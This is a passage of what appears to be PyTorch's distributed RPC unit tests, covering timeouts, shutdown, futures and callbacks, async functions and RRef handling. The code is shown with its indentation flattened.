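#     dist.barrier()                          # hold peers until everyone has checked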
@dist_init
def test_disable_gil_profiling(self):
# Test that when GIL profiling is disabled (rpc.enable_gil_profiling(False),
# which is the default), GIL wait time is not recorded.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in Python 3.6+, so here we
# manually check that the keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# Futures should time out and be marked with an exception indicating as much.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
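# Timeout precedence illustrated by the two tests above: a per-call `timeout=`
# argument overrides the agent-wide default set via rpc._set_rpc_timeout(), and a
# value of 0 disables the timeout entirely, e.g.
#
#     rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)   # 5 s cap
#     rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0)  # never times out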
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
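# Minimal usage sketch of the _wait_all() helper exercised above: futures created
# inside the block are recorded on _thread_local_var.future_list and waited on when
# the block exits.
#
#     with _wait_all():
#         fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
#     # here fut.done() is True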
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash;
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this node.
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
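# Background for the assertion above (simplified): the default RPC pickler sends
# Python functions by reference (module plus qualified name) rather than by value,
# so once the callee has removed `foo_add` from its module the call cannot be
# resolved there, and the failure surfaces as the RuntimeError matched above rather
# than a crash.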
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This prevents Python from garbage collecting a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
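# Note on the checks above: the RPC layer is expected to preserve the view's strides
# rather than force a contiguous copy, so the returned tensor compares equal to the
# sent view element-wise while still reporting is_contiguous() == False.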
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes,
# so add a 'then' callback that runs afterwards to guarantee we wait for the first callback.
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
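# Contrast with fut.then() used elsewhere in this file: add_done_callback() runs the
# callback purely for its side effects and returns None, while then() returns a new
# Future carrying the callback's return value, e.g. (sketch):
#
#     fut.add_done_callback(lambda f: print(f.wait()))  # no chained Future
#     fut2 = fut.then(lambda f: f.wait() + 1)           # fut2.wait() == result + 1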
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
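# Why 3 * 4 * x above (assuming each *_async_add(dst, x, x, y) helper returns
# x + x + y): with x = ones and y = ones + 1, every proxy call yields 4 * x, and the
# static, class, and bound flavors are summed, giving 12 * x.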
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
